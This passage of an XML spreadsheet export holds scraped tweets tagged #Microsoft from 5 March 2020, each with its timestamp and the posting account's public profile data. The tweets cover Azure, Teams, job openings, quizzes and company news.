    <t>Essential stuff for Crisis Communication #powerplatform #sharepoint #Microsofteams #microsoft https://t.co/zTxUDPqq95</t>
  </si>
  <si>
    <t>{'id': 60884413, 'id_str': '60884413', 'name': 'Nithin Mohan(#AzureLad)', 'screen_name': 'nithinmohantk', 'location': 'Letterkenny, Donegal, Ireland', 'description': '.NET Junkie | .NET Foundation Member | OSS Contrib | Azure Evangelist | Cloud/IoT Specialist | Technical Architect | Blogger | Modern Web Dev | Hardware Geek |', 'url': 'https://t.co/pqdMIG1NtR', 'entities': {'url': {'urls': [{'url': 'https://t.co/pqdMIG1NtR', 'expanded_url': 'http://www.azurelad.com', 'display_url': 'azurelad.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 784, 'friends_count': 1170, 'listed_count': 155, 'created_at': 'Tue Jul 28 11:59:36 +0000 2009', 'favourites_count': 1480, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20630, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '022330', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151594487614976000/84Y1Yo9m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151594487614976000/84Y1Yo9m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/60884413/1528967419', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '0EC3F0', 'profile_sidebar_fill_color': '91DE2C', 'profile_text_color': '0A0A0A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:30:08 +0000 2020</t>
  </si>
  <si>
    <t>Under the sea... lies treasure waiting to be claimed. Maybe get onto #SeaofThieves with these limited stock Ocean Shadow controllers? 
@SeaOfThieves What's the best controller for feeling like you're at the helm?
#Microsoft #XboxOne #LimitedStock #PiratesLife #Fairplay #G2G https://t.co/jRC8IrhDCg</t>
  </si>
  <si>
    <t>{'id': 380794635, 'id_str': '380794635', 'name': 'Go2Games', 'screen_name': 'GO2GAMES', 'location': 'Croydon, London', 'description': 'We sell video games! Official Twitter of https://t.co/XMzVdULfmh and home to the Go2Gamers.\n#GET2GAMING', 'url': 'http://t.co/7446u4NBgl', 'entities': {'url': {'urls': [{'url': 'http://t.co/7446u4NBgl', 'expanded_url': 'http://www.go2games.com', 'display_url': 'go2games.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/XMzVdULfmh', 'expanded_url': 'http://www.Go2Games.com', 'display_url': 'Go2Games.com', 'indices': [41, 64]}]}}, 'protected': False, 'followers_count': 1638, 'friends_count': 317, 'listed_count': 34, 'created_at': 'Tue Sep 27 07:32:09 +0000 2011', 'favourites_count': 793, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4658, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CDCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/724526935028715520/0ub9qmkn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/724526935028715520/0ub9qmkn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/380794635/1560517064', 'profile_link_color': '0094AE', 'profile_sidebar_border_color': 'A9AA9B', 'profile_sidebar_fill_color': 'E8E8E8', 'profile_text_color': '353B34', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat.. #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Thu Mar 05 12:29:04 +0000 2020</t>
  </si>
  <si>
    <t>Highlights from @OracleOpenWorld #OOWLON: Our partnership w/ #Microsoft is expanding once again, catering to customers who use both #Azure &amp;amp; @OracleCloud solutions. https://t.co/h7omAInE4a https://t.co/2rqqFq0DvB</t>
  </si>
  <si>
    <t>{'id': 117037258, 'id_str': '117037258', 'name': 'Becca Wan', 'screen_name': 'BeccaWan', 'location': 'London, England', 'description': 'Senior Marketing Manager - EMEA #Event Excellence, @Oracle. Follow me for content updates on #marketing, #cloud &amp; #innovation. View expressed are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1070, 'friends_count': 1024, 'listed_count': 71, 'created_at': 'Wed Feb 24 10:10:51 +0000 2010', 'favourites_count': 4516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2615, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ECF018', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1050750366038548481/1GvrcAik_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1050750366038548481/1GvrcAik_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117037258/1537178231', 'profile_link_color': 'DD2E44',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</si>
  <si>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Thu Mar 05 12:28:50 +0000 2020</t>
  </si>
  <si>
    <t>More and more management positions at the employer of #LinusTorvalds are picked up by people who receive massive salaries from #Microsoft (millions of dollars)  https://t.co/7duoVMuvp4</t>
  </si>
  <si>
    <t>Thu Mar 05 12:27:41 +0000 2020</t>
  </si>
  <si>
    <t>Discover a game-changing approach to Windows 10 Upgrade Testing - Read more here - https://t.co/Ntz6YKorPG #Windows10 #o365 #makingsoftwarework #upgrade #microsoft #office365 #azure #cloud #devops #windows #testing</t>
  </si>
  <si>
    <t>{'id': 368805777, 'id_str': '368805777', 'name': 'ROQ', 'screen_name': 'ROQTALK', 'location': 'England, United Kingdom', 'description': 'We make software work', 'url': 'https://t.co/OrAg7mCBVp', 'entities': {'url': {'urls': [{'url': 'https://t.co/OrAg7mCBVp', 'expanded_url': 'http://www.roq.co.uk', 'display_url': 'roq.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 873, 'friends_count': 941, 'listed_count': 82, 'created_at': 'Tue Sep 06 08:01:55 +0000 2011', 'favourites_count': 851, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3311,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'http://pbs.twimg.com/profile_images/748535147587317760/Z-7KFvf4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/748535147587317760/Z-7KFvf4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/368805777/1467296777', 'profile_link_color': 'FF691F',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</si>
  <si>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Mar 05 12:27:06 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) 
D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1652075268, 'id_str': '1652075268', 'name': 'Shiva Kumar', 'screen_name': 'Mj180Shiva', 'location': 'Hyderabad, India', 'description': "i don't tweet anything funny, just a spammer...No need to follow me.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3478, 'friends_count': 4388, 'listed_count': 134, 'created_at': 'Wed Aug 07 05:17:19 +0000 2013', 'favourites_count': 116228, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 246177,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'http://pbs.twimg.com/profile_images/1058371094694920197/sD_Wb08S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1058371094694920197/sD_Wb08S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1652075268/1565856697',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</si>
  <si>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12:25:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Africa Development Center is hiring a Software Engineer to join its Cognition Africa engineering team in Lagos to build Mixed Reality Cloud Services.  
https://t.co/y2LcRWGkJa  
#Microsoft #MicrosoftADC</t>
  </si>
  <si>
    <t>Thu Mar 05 12:25:03 +0000 2020</t>
  </si>
  <si>
    <t>It is great to see Microsoft Teams release a constant flow of improvements!
#Teams #Microsoft #Collaboration #MSFT
https://t.co/AjBKJoAB59</t>
  </si>
  <si>
    <t>It's time to shake your brain cells
Choose the correct answer and comment below
Q14. Where is the Headquarter of Microsoft Office Located?
#ContestAlert #99jobs #quizcontest #ContestIndia #ITquiz #ContestTime #ContestAlertIndia #Contest_Alert #contests #contest #Microsoft https://t.co/S7G53rzxYt</t>
  </si>
  <si>
    <t>{'id': 1128891805116784640, 'id_str': '1128891805116784640', 'name': '99 Jobs Pvt Ltd', 'screen_name': '99_pvt', 'location': 'Pune, India', 'description': '99 Jobs Pvt Ltd is a perfect blend of providing contract staffing solutions to the verticals of all industries in PAN India', 'url': 'https://t.co/JDEIasInd1', 'entities': {'url': {'urls': [{'url': 'https://t.co/JDEIasInd1', 'expanded_url': 'https://www.99jobs.co.in/', 'display_url': '99jobs.co.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 326, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Thu May 16 05:15:54 +0000 2019', 'favourites_count': 971, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 290,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'http://pbs.twimg.com/profile_images/1149664477035388931/tViUB2s-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149664477035388931/tViUB2s-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1128891805116784640/1557984000',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</si>
  <si>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12:24:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release new Edge Dev update with 'Set to Default Browser' button   https://t.co/6yS7tsbZbD by @mspoweruser</t>
  </si>
  <si>
    <t>Thu Mar 05 12:24:25 +0000 2020</t>
  </si>
  <si>
    <t>New post : MacBook vs @MicrosoftUK surface which do I want to get ? Check out todays post to see. #blogger #ukblogger #gamer #ContentCreator #tech #techblog #techblogger #surface #microsoft #apple https://t.co/hRa1Y0p01D</t>
  </si>
  <si>
    <t>{'id': 2816775919, 'id_str': '2816775919', 'name': 'Lucy ðŸ˜', 'screen_name': 'NorthGirlGames', 'location': '', 'description': 'Games, Tech &amp; Lifestyle blogger from the UK | Discord : https://t.co/c3njy6fN14', 'url': 'https://t.co/2TEnCvUDJg', 'entities': {'url': {'urls': [{'url': 'https://t.co/2TEnCvUDJg', 'expanded_url': 'http://www.tnggames.co.uk', 'display_url': 'tnggames.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/c3njy6fN14', 'expanded_url': 'https://discord.gg/NeQm9e7', 'display_url': 'discord.gg/NeQm9e7', 'indices': [56, 79]}]}}, 'protected': False, 'followers_count': 2590, 'friends_count': 4960, 'listed_count': 69, 'created_at': 'Thu Sep 18 10:02:26 +0000 2014', 'favourites_count': 28381, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10351,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'http://pbs.twimg.com/profile_images/869825749972393984/-Qq1sPmK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/869825749972393984/-Qq1sPmK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2816775919/1496217267',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</si>
  <si>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12:23:49 +0000 2020</t>
  </si>
  <si>
    <t>#WSL is dead. Only #Microsoft employees and their #propaganda agents, like Bogdan Popa in this case, promote this Trojan horse that's an attack on #GNU https://t.co/9kFMdmDVLY ... https://t.co/zoOgZPZNL1</t>
  </si>
  <si>
    <t>Thu Mar 05 12:23:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to introduce a free tier of its Cosmos DB #NoSQL database on March 6. #Azure Cosmos DB is a multi-model, globally distributed #cloud #database #graphdatabase #graphDB #data #tech #freebies #EmergingTech #softwareengineering https://t.co/1rchRtoVSd https://t.co/QUXR05vR8U</t>
  </si>
  <si>
    <t>{'id': 2277104654, 'id_str': '2277104654', 'name': 'George Anadiotis', 'screen_name': 'linked_do', 'location': 'Berlin, Germany', 'description': 'Writer, planner, doer, juxtaposed #innovation #futureofwork #tech #AI https://t.co/0OQSPwV3Ln #datascience #opendata #opensource #commons #cleanpower #climatejustice', 'url': 'http://t.co/3Qm4tzEFTF', 'entities': {'url': {'urls': [{'url': 'http://t.co/3Qm4tzEFTF', 'expanded_url': 'http://linkeddataorchestration.com/', 'display_url': 'linkeddataorchestration.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/0OQSPwV3Ln', 'expanded_url': 'http://yearofthegraph.xyz', 'display_url': 'yearofthegraph.xyz', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 1474, 'friends_count': 1175, 'listed_count': 117, 'created_at': 'Sun Jan 05 04:46:50 +0000 2014', 'favourites_count': 3006, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3718,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'http://pbs.twimg.com/profile_images/787184408503746560/aWhY3xx2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/787184408503746560/aWhY3xx2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2277104654/1571699880',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</si>
  <si>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12:23:00 +0000 2020</t>
  </si>
  <si>
    <t>With Keara Luehrsen learn how #HPEGreenlake / #Azure-As-A-Service is an optimization vehicule to achieve the Business and IT Transformation
#HPE #Microsoft #HybridCloud #Social4UTV @HPE_pointnext
 #WomenInTech #WomenInSTEM #PayAsYouGo #AzurestackHub https://t.co/KV6MLM1lqJ</t>
  </si>
  <si>
    <t>Thu Mar 05 12:22:19 +0000 2020</t>
  </si>
  <si>
    <t>Good context and coverage on our recent announcement from #Microsoft and others regarding our corporate action on #climate change https://t.co/FvJp4Np79x</t>
  </si>
  <si>
    <t>{'id': 264170786, 'id_str': '264170786', 'name': 'David Howe ðŸ‡ªðŸ‡º', 'screen_name': 'Flashywhiskers', 'location': 'Perth, Scotland', 'description': 'Love running, love Scotland, business leader at Microsoft by day. Studying MSc in sustainable mountain development @ThinkUHI. #showyourstripes', 'url': 'https://t.co/KSDOE83mL4', 'entities': {'url': {'urls': [{'url': 'https://t.co/KSDOE83mL4', 'expanded_url': 'http://www.flashywhiskers.com', 'display_url': 'flashywhiskers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 333, 'friends_count': 1221, 'listed_count': 14, 'created_at': 'Fri Mar 11 13:15:15 +0000 2011', 'favourites_count': 14183, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3953, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCEBB6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/611285631868796929/i3tgbucF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/611285631868796929/i3tgbucF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/264170786/1579118750', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': 'F0A830', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': '5E412F', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:22:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft internship opportunities for students &amp;amp; recent graduates in Egypt, Oman, United Arab Emirates, Saudi Arabia, Turkey, Qatar, Kuwait, South Africa, Morocco, Kenya  
https://t.co/1u4XEOXlnK  
#internship #Microsoft #Africa #middleeast</t>
  </si>
  <si>
    <t>Thu Mar 05 12:16:58 +0000 2020</t>
  </si>
  <si>
    <t>We are extremely happy to announce that we have achieved #Microsoft Azure Expert Managed Services Provider status by providing exceptional service to our customers on their #cloud journey! Learn more: https://t.co/ELG64vJgfn https://t.co/lku8qocO63</t>
  </si>
  <si>
    <t>{'id': 21855669, 'id_str': '21855669', 'name': 'Logicalis UK', 'screen_name': 'LogicalisUK', 'location': 'UK', 'description': 'We are #ArchitectsOfChange.', 'url': 'http://t.co/15KD8lWPGa', 'entities': {'url': {'urls': [{'url': 'http://t.co/15KD8lWPGa', 'expanded_url': 'http://www.uk.logicalis.com/', 'display_url': 'uk.logicalis.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3089, 'friends_count': 657, 'listed_count': 114, 'created_at': 'Wed Feb 25 11:17:05 +0000 2009', 'favourites_count': 710, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4936, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '323365', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/804272205416853504/4GBdoK_Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/804272205416853504/4GBdoK_Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21855669/1580984989', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:16:11 +0000 2020</t>
  </si>
  <si>
    <t>The first #SUGDE usergroup meeting of 2020 starts with the presentation by Axel about #Microsoft #Azure #DevOps #kuehlhaus https://t.co/6hiSsUT2lj</t>
  </si>
  <si>
    <t>{'id': 976390341887713281, 'id_str': '976390341887713281', 'name': 'Stefan Graber', 'screen_name': 'stefangraber_sc', 'location': 'Mannheim, Baden-WÃ¼rttemberg', 'description': 'Solution Architect at kuehlhaus and Sitecore Technology MVP 2019', 'url': 'https://t.co/CIWCFZQwMO', 'entities': {'url': {'urls': [{'url': 'https://t.co/CIWCFZQwMO', 'expanded_url': 'https://stefans-sitecore-blog.kuehlhaus.com', 'display_url': 'stefans-sitecore-blog.kuehlhaus.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 173, 'listed_count': 6, 'created_at': 'Wed Mar 21 09:29:32 +0000 2018', 'favourites_count': 900, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 214, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/976392962438557696/nxNQKocU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/976392962438557696/nxNQKocU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/976390341887713281/1522235273',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</si>
  <si>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12:15:29 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Full-time opportunities for MBA students &amp;amp; recent graduates (Finance) in South Africa, United Arab Emirates, Turkey, Saudi Arabia.
https://t.co/ZJne4o1wau 
#Microsoft #opportunities</t>
  </si>
  <si>
    <t>Thu Mar 05 12:15:21 +0000 2020</t>
  </si>
  <si>
    <t>Two of our staff members recently undertook training for the brand new software, Windows Virtual Desktop at the Microsoft offices in London.  This new cutting edge software assures exciting progression for Support on the Spot in the coming months. #remoteit #business #microsoft https://t.co/EUwm6vDn79</t>
  </si>
  <si>
    <t>{'id': 1222103366395887616, 'id_str': '1222103366395887616', 'name': 'Support On The Spot', 'screen_name': 'SotSPortsmouth', 'location': 'Technopole, Portsmouth', 'description': 'IT Support, Hosting and Hardware you can count on whenever you need it.', 'url': 'https://t.co/XmWuODgNyY', 'entities': {'url': {'urls': [{'url': 'https://t.co/XmWuODgNyY', 'expanded_url': 'http://www.supportonthespot.co.uk', 'display_url': 'supportonthespot.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Tue Jan 28 10:25:34 +0000 2020', 'favourites_count': 26,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'http://pbs.twimg.com/profile_images/1222868114150510592/eBbrfVgM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222868114150510592/eBbrfVgM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1222103366395887616/1580389454',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</si>
  <si>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12:15:06 +0000 2020</t>
  </si>
  <si>
    <t>2 Days Microsoft Azure Public Cloud Training Offered by COMET @ Rs. 5,000/- only. 
Date: - 7th (Sat) Mar &amp;amp; 8th (Sun) Mar 2020. 
Contact Mr. Ramesh: - 9940068251, Mr. Ilanchezhian -9940058251. 
#AzureDevOps  #cloud #Microsoft #Microsoft365 #MicrosoftEDU https://t.co/FzFefCr1pX</t>
  </si>
  <si>
    <t>{'id': 1144566435542265857, 'id_str': '1144566435542265857', 'name': 'COMET Compuserve Pvt Ltd', 'screen_name': 'CometPvt', 'location': 'Porur, chennai.', 'description': 'COMET Compuserve Pvt Ltd Founded in 2006 is managed by professionals', 'url': 'https://t.co/gmSoI7O3eU', 'entities': {'url': {'urls': [{'url': 'https://t.co/gmSoI7O3eU', 'expanded_url': 'http://www.cometcompuserve.com', 'display_url': 'cometcompuserve.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 114, 'listed_count': 0, 'created_at': 'Fri Jun 28 11:21:18 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 82, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1147812509543362561/yXsVG_NC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147812509543362561/yXsVG_NC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144566435542265857/1568201979',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</si>
  <si>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12:14:24 +0000 2020</t>
  </si>
  <si>
    <t>Things sure have changed. #ThrowbackThursday
#Microsoft #Apple #HP #Logitech #Iball #Amkette #meme #memes #bestmemes #memesdaily #jokes #memesrlife #humor #relatablememes #funnyposts #memetime #throwbackthursdays https://t.co/Q8xjHabK6g</t>
  </si>
  <si>
    <t>{'id': 1095631344850235392, 'id_str': '1095631344850235392', 'name': 'Designz Cloud', 'screen_name': 'DesignzCloud', 'location': 'Kolkata, India', 'description': 'Weâ€™re a boutique digital agency striving to help businesses make their online presence meaningful with our strategic digital marketing &amp; intuitive IT solution.', 'url': 'https://t.co/Z309L1xMWe', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z309L1xMWe', 'expanded_url': 'https://www.designzcloud.com/', 'display_url': 'designzcloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 39, 'listed_count': 0, 'created_at': 'Wed Feb 13 10:30:43 +0000 2019', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 67, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1095632121656336384/WpzLepvR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095632121656336384/WpzLepvR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1095631344850235392/1560508276',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</si>
  <si>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12:12:45 +0000 2020</t>
  </si>
  <si>
    <t>If trying to win more enterprise deals, it is smart to target industry with the least competition.  In retail, #Google Cloud really only has Microsoft to deal with. Tough to give $ to Amazon (#AWS) if you are a retailer.  Battle with #Microsoft is intense https://t.co/UE7TWL7xBG</t>
  </si>
  <si>
    <t>{'id': 379136707, 'id_str': '379136707', 'name': 'Adam Mansfield', 'screen_name': 'Adam_Mansfield_', 'location': 'Boston, MA', 'description': 'Advisor to enterprises looking to improve their #Microsoft #Salesforce and #ServiceNow #cloud relationships. Also a lifelong Boston Celtics fan', 'url': 'https://t.co/8l1d1ALmhe', 'entities': {'url': {'urls': [{'url': 'https://t.co/8l1d1ALmhe', 'expanded_url': 'http://www.upperedge.com', 'display_url': 'upperedge.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 633, 'friends_count': 1101, 'listed_count': 33, 'created_at': 'Sat Sep 24 12:43:57 +0000 2011', 'favourites_count': 2256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3462,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'http://pbs.twimg.com/profile_images/1075059657641586688/QMb5IOSn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075059657641586688/QMb5IOSn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/379136707/1546891208',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</si>
  <si>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12:12:09 +0000 2020</t>
  </si>
  <si>
    <t>Logicalis Awarded Microsoft Azure Expert Managed Service Provider Status. https://t.co/MT6mF2tfXs #Logicalis #ArchitectsofChange #Microsoft #Azure #MSP https://t.co/unoQZySgIG</t>
  </si>
  <si>
    <t>{'id': 2168765736, 'id_str': '2168765736', 'name': 'Logicalis AR', 'screen_name': 'LogicalisAR', 'location': 'Global', 'description': 'Analyst Relations at Logicalis, a leading global IT solutions &amp; managed services provider', 'url': 'http://t.co/x2Yn3SNhNt', 'entities': {'url': {'urls': [{'url': 'http://t.co/x2Yn3SNhNt', 'expanded_url': 'http://www.logicalis.com', 'display_url': 'logicalis.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 376, 'friends_count': 1093, 'listed_count': 19, 'created_at': 'Fri Nov 01 17:02:03 +0000 2013', 'favourites_count': 217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 594,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'http://pbs.twimg.com/profile_images/1233375353428758529/L7Xo5tgS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233375353428758529/L7Xo5tgS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2168765736/1582895001',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</si>
  <si>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12:10:39 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/BaKMxRI8Em</t>
  </si>
  <si>
    <t>{'id': 905314332233261057, 'id_str': '905314332233261057', 'name': 'Qaixen', 'screen_name': 'Qaixen', 'location': 'Cambridge, England', 'description': 'We are a Digital Workplace Consultancy. We disrupt the traditional consultancy model with an approach based on our core values - Improve, repeat.', 'url': 'https://t.co/qwhCebZgql', 'entities': {'url': {'urls': [{'url': 'https://t.co/qwhCebZgql', 'expanded_url': 'http://qaixen.com', 'display_url': 'qaixen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 57, 'friends_count': 66, 'listed_count': 2, 'created_at': 'Wed Sep 06 06:18:51 +0000 2017', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 343,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'http://pbs.twimg.com/profile_images/1216454429102280704/XsYiFOXm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216454429102280704/XsYiFOXm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/905314332233261057/1518031899', 'profile_link_color': '152035',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</si>
  <si>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12:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Belgium ahoy!  @xGokan will guide you thru the basics and the dirty secrets of #MicrosoftTeams at this #ValoPremiumPartner @AMPLEXOR lunchtime workshop on March 24, 2020!  
Register here  https://t.co/Q3TOCMIkTt
#MSTeams #Office365 #SharePoint #Microsoft</t>
  </si>
  <si>
